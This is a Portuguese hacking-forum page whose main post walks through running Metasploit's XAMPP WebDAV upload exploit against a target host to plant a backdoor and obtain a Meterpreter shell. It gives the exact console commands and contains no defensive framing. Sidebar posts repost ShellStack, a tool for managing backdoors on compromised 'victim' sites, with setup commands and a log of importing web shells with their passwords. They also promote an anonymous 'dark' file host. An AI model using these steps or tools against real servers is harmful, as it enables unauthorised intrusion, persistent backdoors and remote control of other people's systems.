Ir para conteúdo
Entre para seguir isso  
FaceOs

EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT

Recommended Posts

FaceOs    50

EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT

Bem pessoal, hoje vou lhes apresentar um exploit muito bacana no XAMPP que inclusive possui um módulo no Metasploit.

Primeiramente, precisamos do Metasploit Framework no computador, certo? Ele possui tanto suas versões para Linux e Windows, através do site da Rapid7

Então, com o Metasploit instalado, vamos começar.

 

Se você estiver no Windows, vá até a pasta do Metasploit e digite:

msfconsole

Ou

console

 

Caso esteja no Linux, instale com o install.sh ou mova os scripts do MSF para o "/root/bin".

 

Pronto, quando o Metasploit carregar, digite:

use exploit/windows/http/xampp_webdav_upload_php

Após isso, irá carregar o módulo do exploit.

Agora a gente irá setar as funções: RHOST, RPORT e EXPLOIT.

No RHOST - A gente irá mencionar o nosso site/ip alvo.

No RPORT -  A gente irá setar a porta da conexão do alvo, pode ser 80, 8443, 8090,8033, 8080... Enfim.

E no EXPLOIT - Nós iremos rodar o exploit e conseguir o Meterpreter no servidor, ou seja, upar a backdoor e ganhar a shell.

 

Vamos lá então:

set RHOST www.target.com
set RPORT 80
exploit

 

Ilustrações:

1.PNG

2.PNG

3.PNG

4.PNG

  • Haha 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Entre para seguir isso  



  • Conteúdo Similar

    • Por João Escobar
      O DARK_FILES está finalizado galera! 
      Ontem postei sobre ele no Facebook pedindo ajuda na questão da criptografia e, hoje, após um dia inteiro trabalhando nele consegui fazer uma criptografia FODA e finalizá-lo!
      Pra quem tiver interesse em conhecer:
      http://darkfiles.hk.tn/
      O QUE É:
      Hospedagem de arquivos 100% anônima (criptografia individual), limpa (sem anúncios/espera), segura e sem deixar rastros (server anon na Espanha, rs). Aqui seus arquivos 'dark' ficarão seguros.
      ~Por enquanto~ o upload máximo é 10MB, mas logo logo vai ser alterado pra mais. QUALQUER crítica/sugestão é muito bem vinda e vai ajudar muito.
      Fiz esse projeto pra estudo, com inspiração no antigo ObscuredFiles.
      Façam bom uso 
    • Por doug
      Curso: PHP do Zero ao Profissional
      Editora: B7Web
      Gênero: Programação / PHP
      DOWNLOAD
    • Por Prosniper
      Uma ferramenta baseada em PHP que ajuda você a gerenciar todos os seus sites Backdoored de forma eficiente. 

      O ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "HACKERS" que desejam manter uma faixa de cada site que eles cortaram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar o URL de backdoor no shells.txt presente no diretório da ferramenta.
      Com ShellStack você pode
      Importar shells PHP Obter detalhes do servidor Carregar arquivos do seu sistema usando seu terminal E acima de tudo, você pode gerenciar suas portas traseiras de forma eficiente  Como usar
      git clone https://github.com/Tuhinshubhra/shellstack cd shellstack php shellstack.php generatebd saia utilizando CTRL + C  Isso gerará um arquivo de backdoor no mesmo diretório que a ferramenta em um arquivo chamado backdoor.php Carregue o arquivo Backdoor para o site da Vítima Copie o URL do Backdoor e cole-o no arquivo shells.txt presente no diretório da ferramenta e salve-o ( Cada backdoor está separado por uma nova linha ) php shellstack.php Digite o número de série atribuído ao Backdoor O resto é bastante auto-explicativo Veja o vídeo aqui:  Requisitos
      php curl Exemplo
      [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php ________________________________________________________________________________ _______ _ _ _______ _______ _______ _______ _______ _ _ |______ |_____| |______ | | |______ | |_____| | |____/ ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ ________________________________________________________________________________ Simple Backdoor Management System Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra Shout Out: LulZSec India ================================================================================ List Of Backdoors: 0. http://localhost/backdoor.php ============================================= [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 [+] Shell Selected: http://localhost/backdoor.php [+] Validating Backdoor: Backdoor Found! List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):2 [+] Server Info [i] Sending Request And Getting Response... [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 [i] Server IP: 127.0.0.1 Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):1 List Of Shells =============== [1] Dhanush shell {User & Pass : shellstack123} [2] B374K shell {Pass : shellstack123} [3] Kurama shell V.1.0 {Pass : red} [4] WSO shell {Pass : shellstack123} [5] MiNi shell {User & Pass : shellstack123} [#] Select Shell To Import(1-5):1 [i] Importing Shell... [i] Sending Request And Getting Response... [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):5 [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# Versão 
      Versão 1.0 Screenshot

      Tutorial retirado do site:  http://www.kitploit.com
    • Por Ice_Boy
      Acabei de lançar um espaço em meu projeto para softwares e aplicações que utilizem como base os princípios da matemática, segue link: http://webzhiak.com.br/apps/.
      Além de você poder utilizar o app em seu navegador, poderá ver o código fonte no github
    • Por Zaraki Kenpachi
      Acessando Métodos não estáticos, a partir de um método estático.
      Sabe-se que em PHP, não se pode usar o $this dentro de métodos estáticos. E que também ao acessar um método estático, o construtor não é executado. Então, utiliza-se muito de um hack method pra que não seja necessário instanciar a classe pra utilizar-se dos outros métodos não estáticos. Segue um exemplo:
      Método normal:
      Acessando de forma normal, classes não estáticas:
      <?php class Banco {// private static $Conn; function __construct(){ self::$Conn = new PDO('mysql:host=localhost;dbname=meuDb', 'root', ''); } public function consulta($queryString){ $stmt = self::$Conn->prepare($queryString); $stmt->execute(); return $stmt->fetchAll(); } }// {// Executando a consulta $db = new Banco;//Instanciando um objeto da classe Banco $dadosRetornados = $db->consulta("SELECT * FROM produtos");// Utilizando o método consulta, a partir do objeto criado. } O que acontece aqui é o seguinte... Temos uma classe que faz consulta no banco de dados e por padrão, temos de instanciar um objeto dessa classe pra que possamos utilizar de seus métodos de consulta.
      Acessando pelo hack method
      Acessando metodo sem ter que instanciar classes:
      <?php class Banco {// private static $Conn; private static $Instance; function __construct(){ self::$Conn = new PDO('mysql:host=localhost;dbname=meuDb', 'root', ''); } public static function run(){ if(is_null(self::$Instance)){ self::$Instance = new self(); } return self::$Instance; } public function consulta($queryString){ $stmt = self::$Conn->prepare($queryString); $stmt->execute(); return $stmt->fetchAll(); } }// {// Executando a consulta $db = Banco::run()->consulta("SELECT * FROM produtos"); } O que acontece no código acima é: Criamos um método estático, que retorna uma instância de objeto da própria classe. Ou seja, ao invés de termos de instanciar a classe por nós mesmos, esse método estática (Que lembrando, pode ser acessada sem que um objeto dessa classe seja instanciado anteriormente por ser static) faz isso por nós.
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.